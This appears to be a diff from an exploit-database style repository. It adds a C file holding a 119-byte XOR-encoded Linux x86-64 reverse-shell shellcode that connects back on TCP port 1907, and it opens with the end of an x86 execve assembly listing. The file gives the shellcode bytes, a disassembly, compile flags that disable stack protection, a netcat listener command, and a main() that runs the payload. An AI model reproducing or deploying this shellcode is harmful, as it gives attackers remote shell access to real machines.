; mov edx, eax ; set edx to NULL / not already 0x0 / keeping it here in case you encouter issues with it
push eax ; 0-term on stack
push edi ; added for args
push esi ; added for args
push ebx ; pointer to /user////bin/head
mov al, 0xb ; set syscall execve
mov ecx,esp ; move stack pointer into ecx
int 0x80 ; make syscall

94
shellcodes/linux_x86-64/45943.c Normal file
View file

@ -0,0 +1,94 @@
/*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
Test:
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.
<shellproccod>: 0x48 0x31 0xc9 0x48 0x81 0xe9 0xf6 0xff
<shellproccod+8>: 0xff 0xff 0x48 0x8d 0x05 0xef 0xff 0xff
<shellproccod+16>: 0xff 0x48 0xbb 0xdf 0x4b 0x06 0xb1 0x71
<shellproccod+24>: 0x71 0x46 0x28 0x48 0x31 0x58 0x27 0x48
<shellproccod+32>: 0x2d 0xf8 0xff 0xff 0xff 0xe2 0xf4 0xb5
<shellproccod+40>: 0x62 0x5e 0x28 0x1b 0x73 0x19 0x42 0xde
<shellproccod+48>: 0x15 0x09 0xb4 0x39 0xe6 0x0e 0x91 0xdd
<shellproccod+56>: 0x4b 0x01 0xc2 0x0e 0x71 0x46 0x29 0x8e
<shellproccod+64>: 0x03 0x8f 0x57 0x1b 0x61 0x1c 0x42 0xf5
<shellproccod+72>: 0x13 0x09 0xb4 0x1b 0x72 0x18 0x60 0x20
<shellproccod+80>: 0x85 0x6c 0x90 0x29 0x7e 0x43 0x5d 0x29
<shellproccod+88>: 0x21 0x3d 0xe9 0xe8 0x39 0xfd 0x07 0xbd
<shellproccod+96>: 0x22 0x68 0x9e 0x02 0x19 0x46 0x7b 0x97
<shellproccod+104>: 0xc2 0xe1 0xe3 0x26 0x39 0xcf 0xce 0xd0
<shellproccod+112>: 0x4e 0x06 0xb1 0x71 0x71 0x46 0x28
assembly code is below:
xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060 <shellproccod>
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b <shellproccod+27>
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7 <shellproccod+71>
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad)
sbb $0x42,%al
cmc
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6 <shellproccod+102>
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)
*/
#include <stdio.h>
#include <string.h>
unsigned char shellproccod[] = \
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xdf\x4b\x06\xb1\x71\x71\x46\x28\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xb5\x62\x5e\x28\x1b\x73"
"\x19\x42\xde\x15\x09\xb4\x39\xe6\x0e\x91\xdd\x4b\x01\xc2\x0e"
"\x71\x46\x29\x8e\x03\x8f\x57\x1b\x61\x1c\x42\xf5\x13\x09\xb4"
"\x1b\x72\x18\x60\x20\x85\x6c\x90\x29\x7e\x43\x5d\x29\x21\x3d"
"\xe9\xe8\x39\xfd\x07\xbd\x22\x68\x9e\x02\x19\x46\x7b\x97\xc2"
"\xe1\xe3\x26\x39\xcf\xce\xd0\x4e\x06\xb1\x71\x71\x46\x28";
int main()
{
printf("Shellcode len: %d\n", strlen(shellproccod));
int (*ret)() = (int(*)())shellproccod;
ret();
}